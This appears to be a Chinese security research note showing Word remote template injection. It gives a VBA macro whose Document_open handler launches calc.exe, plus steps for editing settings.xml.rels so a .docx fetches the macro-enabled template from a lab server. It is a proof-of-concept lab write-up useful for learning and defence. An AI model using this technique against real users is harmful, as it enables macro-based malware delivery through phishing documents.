返回首页
EN
H7 / SECURITY RESEARCH NOTES

通过word模板注入调用恶意宏代码弹出计算器

环境说明

IPHOSTNAMENOTE
172.16.103.21Win10受害机
10.10.10.85CentOS7恶意文件服务器

相关脚本

内容下载
powershelldocxdotm文件点击下载

原理

  • word模板注入是利用Word文档加载附加模板时的缺陷,加载的模板是带宏的恶意模板,从而间接执行宏代码。模板注入分为远程和本地模板,远程通过http协议加载模板,本地可以通过file协议加载,实战中大部分都是远程加载。

远程模板注入

先创建一个启用宏的dotm文件

Private Sub StartCalculator_open()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "calc.exe"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub

Private Sub Document_open()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "calc.exe"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub

将宏文档部署到web服务器上

创建一个docx文件远程调用宏文档

  • 创建一个docx文件,选用一个word的模板,然后将docx用压缩工具打开并修改./word/_rels/settings.xml.rels文件的Target地址

  • 打开修改后的docx文件,就会远程加载启用了宏的文件然后弹出计算器

参考链接:

1.https://zerokeeper.com/web-security/office-document-attack-surface.html